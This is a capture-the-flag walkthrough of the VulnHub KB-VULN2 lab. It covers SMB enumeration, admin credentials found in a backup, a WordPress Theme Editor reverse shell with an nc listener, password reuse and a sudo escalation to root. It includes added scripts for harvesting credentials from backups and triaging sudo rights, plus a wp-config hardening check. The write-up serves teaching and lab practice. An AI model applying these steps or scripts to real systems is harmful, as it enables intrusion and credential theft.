Today we are going to hack the VulnHub machine KB-VULN2. You can download it from: http://vulnhub.com/entry/kb-vuln-2,562/
  • Enumeration
    We start with an nmap scan of all TCP ports to see what is open.
    ~ > nmap -A -p-
    Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-28 11:45 CEST
    Nmap scan report for 
    Host is up (0.0024s latency).
    Not shown: 65530 closed ports
    PORT    STATE SERVICE     VERSION
    21/tcp  open  ftp         vsftpd 3.0.3
    22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 5e:99:01:23:fe:c4:84:ef:14:55:87:da:a3:30:6f:50 (RSA)
    |   256 cb:8e:e1:b3:3a:6e:64:9e:0f:53:39:7e:18:9d:8b:3f (ECDSA)
    |_  256 ec:3b:d9:53:4a:5a:f7:32:f2:3a:f7:a7:6f:31:87:52 (ED25519)
    80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Apache2 Ubuntu Default Page: It works
    139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
    Service Info: Host: UBUNTU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    Host script results:
    |_clock-skew: mean: 0s, deviation: 1s, median: 0s
    |_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | smb-os-discovery:
    |   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
    |   Computer name: kb-server
    |   NetBIOS computer name: UBUNTU\x00
    |   Domain name: \x00
    |   FQDN: kb-server
    |_  System time: 2020-09-28T09:45:55+00:00
    | smb-security-mode:
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2020-09-28 11:45:54
    |_  start_date: N/A

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 20.51 seconds
    Samba is listening on 139/445 and the smb-security-mode script shows that guest access is accepted (account_used: guest). The server exposes a share named Anonymous, so we connect to it without credentials.
    ~ > smbclient \\\\\\Anonymous
    mkdir failed on directory /var/run/samba/msg.lock: Permission denied
    Unable to initialize messaging context
    Enter WORKGROUP\sml's password:
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Thu Sep 17 12:58:56 2020
      ..                                  D        0  Wed Sep 16 12:36:09 2020
      backup.zip                          N 16735117  Thu Sep 17 12:58:56 2020

                    14380040 blocks of size 1024. 8497088 blocks available
    smb: \>
    We download backup.zip.
    smb: \> get backup.zip
    getting file \backup.zip of size 16735117 as backup.zip (71995,1 KiloBytes/sec) (average 71995,1 KiloBytes/sec)
    smb: \>
    We extract it.
    ~ > unzip backup.zip
    It extracts a "wordpress" folder and a file named remember_me.txt. The file contains a set of credentials:
    ~ > cat remember_me.txt
    Username:admin
    Password:MachineBoy141
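    A leaked backup usually holds more than one note file, so it is worth triaging it systematically rather than cat-ing files one by one. The script below is an added example and is not part of the original writeup: it walks an extracted backup directory, pulls "Username:/Password:" style pairs out of text notes, and reads the active define() constants (DB_USER, DB_PASSWORD, ...) from any wp-config.php it finds, skipping commented-out lines. The writeup does not show the contents of the wordpress folder, so the wp-config.php values used as sample input here are constructed; only the remember_me.txt content comes from the page.

```shell
#!/usr/bin/env bash
# Added example, not from the writeup: credential triage over an extracted backup.
# Two patterns matter in a leaked WordPress backup: loose notes such as the
# "Username:/Password:" pair in remember_me.txt, and the define('DB_USER', ...)
# constants in wp-config.php. The wp-config.php values below are constructed
# for this example; the writeup does not show the real file.
tab=$(printf '\t')

# harvest_creds DIR -> lines of "relative-path<TAB>key<TAB>value"
harvest_creds() {
    dir=$1
    # 1. Plain-text notes: "Username:admin", "password = hunter2", ...
    find "$dir" -type f -name '*.txt' | sort | while IFS= read -r f; do
        rel=${f#"$dir"/}
        grep -iE '^(user(name)?|pass(word)?) *[:=]' "$f" \
          | sed -E "s/^([^:= ]+) *[:=] *(.*)$/\1${tab}\2/" \
          | while IFS="$tab" read -r k v; do
                printf '%s\t%s\t%s\n' "$rel" "$k" "$v"
            done
    done
    # 2. wp-config.php: only active define() lines are taken, so a leftover
    #    "// define('DB_PASSWORD', ...)" from an old config is skipped
    find "$dir" -type f -name 'wp-config.php' | sort | while IFS= read -r f; do
        rel=${f#"$dir"/}
        grep -E "^[[:space:]]*define[[:space:]]*\([[:space:]]*['\"](DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)['\"]" "$f" \
          | sed -E "s/^[[:space:]]*define[[:space:]]*\([[:space:]]*['\"]([A-Z_]+)['\"][[:space:]]*,[[:space:]]*['\"]([^'\"]*)['\"].*$/\1${tab}\2/" \
          | while IFS="$tab" read -r k v; do
                printf '%s\t%s\t%s\n' "$rel" "$k" "$v"
            done
    done
}

# Constructed sample with the same layout the writeup extracts from backup.zip:
# remember_me.txt (content from the page) next to a wordpress/ tree (invented).
make_sample_backup() {
    d=$(mktemp -d)
    mkdir -p "$d/wordpress"
    printf 'Username:admin\nPassword:MachineBoy141\n' > "$d/remember_me.txt"
    cat > "$d/wordpress/wp-config.php" <<'EOF'
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'Example-DB-Pass-1' );
define( 'DB_HOST', 'localhost' );
// define( 'DB_PASSWORD', 'old-commented-out' );
EOF
    printf '%s\n' "$d"
}

# Usage: point it at the directory unzip produced, e.g. harvest_creds ./extracted
sample=$(make_sample_backup)
harvest_creds "$sample"
rm -rf "$sample"
```

    Database credentials recovered this way are worth trying against SSH and su as well, since, as the rest of this writeup shows, passwords on this kind of box tend to be reused.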
    In parallel, we run gobuster against the web server to look for interesting directories.
    ~ > gobuster dir -u -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/09/28 11:55:37 Starting gobuster
    ===============================================================
    /.hta (Status: 403)
    /.htaccess (Status: 403)
    /.htpasswd (Status: 403)
    /index.html (Status: 200)
    /server-status (Status: 403)
    /wordpress (Status: 301)
    ===============================================================
    2020/09/28 11:55:39 Finished
    ===============================================================
    We find the "wordpress" directory. We browse to http://kb-vuln/wordpress/wp-admin and log in with the credentials recovered from the backup:
    Username:admin
    Password:MachineBoy141
    We go to Appearance -> Themes and activate the Twenty Seventeen theme. Once it is active we open Appearance -> Theme Editor and edit the theme's header.php to add a PHP reverse shell. header.php is included on every front-end page rendered by the active theme, so simply loading the site will run the payload as the web server user. Before triggering it, we start an nc listener:
    ~ > nc -nlvp 1234
    listening on [any] 1234 ...
    Then we visit: kb.vuln/wordpress/
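    The admin-to-RCE path used above exists because WordPress ships with the Theme Editor enabled; the defender's fix is the DISALLOW_FILE_EDIT constant in wp-config.php (DISALLOW_FILE_MODS additionally blocks theme and plugin uploads, and with them dashboard updates). The script below is an added example, not part of the writeup or of WordPress itself: it audits a wp-config.php for an active DISALLOW_FILE_EDIT setting, treating commented-out or false defines as still vulnerable, and shows the weak configuration beside the hardened one. The sample configs are constructed for the example.

```shell
#!/usr/bin/env bash
# Added example, not from the writeup: check and fix the WordPress setting that
# makes the Theme Editor -> header.php -> reverse shell route possible.
# Limitation: a define() inside a /* ... */ block comment is still counted as
# active by the line-based check below; verify such files by hand.

# wp_file_edit_status FILE -> prints "disabled" if an active, uncommented
# define('DISALLOW_FILE_EDIT', true) is present, otherwise "allowed".
wp_file_edit_status() {
    if grep -qE "^[[:space:]]*define[[:space:]]*\([[:space:]]*['\"]DISALLOW_FILE_EDIT['\"][[:space:]]*,[[:space:]]*[Tt][Rr][Uu][Ee][[:space:]]*\)" "$1"; then
        echo disabled
    else
        echo allowed
    fi
}

# harden_wp_config FILE -> hardened copy on stdout. The constants must be defined
# before wp-settings.php is required, so they are inserted just above that line
# (or appended if the file has no such require).
harden_wp_config() {
    awk -v q="'" '
        /wp-settings\.php/ && !done {
            print "define( " q "DISALLOW_FILE_EDIT" q ", true );"
            print "define( " q "DISALLOW_FILE_MODS" q ", true );"
            done = 1
        }
        { print }
        END {
            if (!done) {
                print "define( " q "DISALLOW_FILE_EDIT" q ", true );"
                print "define( " q "DISALLOW_FILE_MODS" q ", true );"
            }
        }
    ' "$1"
}

# make_sample_wp_config KIND -> path of a constructed wp-config.php.
# KIND: absent (default WordPress), false, commented (all three still allow
# editing) or hardened.
make_sample_wp_config() {
    f=$(mktemp)
    {
        echo "<?php"
        echo "define( 'DB_NAME', 'wordpress' );"
        case $1 in
            false)     echo "define( 'DISALLOW_FILE_EDIT', false );" ;;
            commented) echo "// define( 'DISALLOW_FILE_EDIT', true );" ;;
            hardened)  echo "define( 'DISALLOW_FILE_EDIT', true );" ;;
        esac
        echo "/* That's all, stop editing! Happy publishing. */"
        echo "require_once ABSPATH . 'wp-settings.php';"
    } > "$f"
    printf '%s\n' "$f"
}

# Usage: wp_file_edit_status /var/www/html/wordpress/wp-config.php
weak=$(make_sample_wp_config absent)
echo "weak config:     $(wp_file_edit_status "$weak")"
hardened=$(mktemp)
harden_wp_config "$weak" > "$hardened"
echo "hardened config: $(wp_file_edit_status "$hardened")"
rm -f "$weak" "$hardened"
```

    Disabling the editor does not remove the need to protect the admin account: an attacker with wp-admin access can still abuse other features, but the one-click path to PHP execution shown in this writeup is closed.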
  • Low Shell
    The connection comes back as www-data. The "/bin/sh: 0: can't access tty" message means we only have a dumb shell, so we spawn a pty with python3 to get a usable one.

    ~ > nc -nlvp 1234
    listening on [any] 1234 ...
    connect to [] from (UNKNOWN) [] 40476
    Linux kb-server 4.15.0-117-generic #118-Ubuntu SMP Fri Sep 4 20:02:41 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
     10:09:56 up 24 min,  0 users,  load average: 0.01, 0.02, 0.09
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $ python3 -c 'import pty;pty.spawn("/bin/bash");'
  • user.txt
    www-data@kb-server:/home/kbadmin$ ls
    note.txt  user.txt
    www-data@kb-server:/home/kbadmin$ cat user.txt
    03bf4d20dac5644c75e69e40bad48db0
    Exploring the system we find a local user named kbadmin. We try the same password that got us into WordPress, this time to switch to kbadmin, and the password has been reused:
    www-data@kb-server:/home/kbadmin$ su kbadmin
    Password: MachineBoy141
    kbadmin@kb-server:~$
  • Privilege Escalation
    We check whether kbadmin has any sudo rights.
    kbadmin@kb-server:~$ sudo -l
    Matching Defaults entries for kbadmin on kb-server:
        env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User kbadmin may run the following commands on kb-server:
        (ALL : ALL) ALL
    kbadmin can run any command as any user via sudo, so root is one command away :)
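    The sudo -l output above is the simplest case: an unrestricted (ALL : ALL) ALL. Real engagements more often turn up NOPASSWD entries or a handful of specific binaries, each of which needs a different follow-up. The script below is an added example, not part of the writeup: it parses sudo -l output and tags every command spec, run here on the exact output shown on this page plus a second, constructed output (user "alice", host "example-host") with NOPASSWD and command-restricted entries.

```shell
#!/usr/bin/env bash
# Added example, not from the writeup: classify the command specs in `sudo -l`
# output. Specs follow the "User X may run the following commands on HOST:" line
# and look like "(RUNAS) [NOPASSWD:] command".
#   full-root            ALL as root/any user          -> sudo su, sudo -i
#   full-root-nopasswd   same, and no password needed
#   nopasswd             specific command, no password  -> check for shell escapes
#   restricted           specific command, password     -> check for shell escapes

# sudo_l_summary < sudo-l-output -> one "tag<TAB>spec" line per command spec
sudo_l_summary() {
    awk '
        /may run the following commands/ { in_specs = 1; next }
        in_specs && /^[[:space:]]*\(/ {
            spec = $0; sub(/^[[:space:]]+/, "", spec)
            runas = spec; sub(/^\(/, "", runas); sub(/\).*$/, "", runas)
            cmds = spec; sub(/^\([^)]*\)[[:space:]]*/, "", cmds)
            nopass = (cmds ~ /^NOPASSWD:/)
            sub(/^NOPASSWD:[[:space:]]*/, "", cmds)
            if (cmds == "ALL" && (runas ~ /^ALL/ || runas ~ /^root/))
                tag = nopass ? "full-root-nopasswd" : "full-root"
            else if (nopass)
                tag = "nopasswd"
            else
                tag = "restricted"
            print tag "\t" spec
        }
    '
}

# Input 1: the sudo -l output from this writeup, verbatim.
page_output='Matching Defaults entries for kbadmin on kb-server:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User kbadmin may run the following commands on kb-server:
    (ALL : ALL) ALL'

# Input 2: constructed output for a user with narrower rights (not from the page).
constructed_output='Matching Defaults entries for alice on example-host:
    env_reset, mail_badpass

User alice may run the following commands on example-host:
    (root) NOPASSWD: /usr/bin/vim
    (www-data) /usr/bin/systemctl status apache2'

# Usage on a live box: sudo -l | sudo_l_summary
printf '%s\n' "$page_output" | sudo_l_summary
printf '%s\n' "$constructed_output" | sudo_l_summary
```

    On this machine the first input yields a single full-root line, which is exactly why "sudo su" is all that is needed in the next step; a nopasswd or restricted tag instead points at checking the listed binary for a shell escape.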
  • root.txt
    kbadmin@kb-server:~$ sudo su
    root@kb-server:/home/kbadmin# cd ~
    root@kb-server:~# ls
    flag.txt
    root@kb-server:~# cat flag.txt
    dc387b4cf1a4143f562dd1bdb3790ff1
  • End
    And with that we are root on the machine.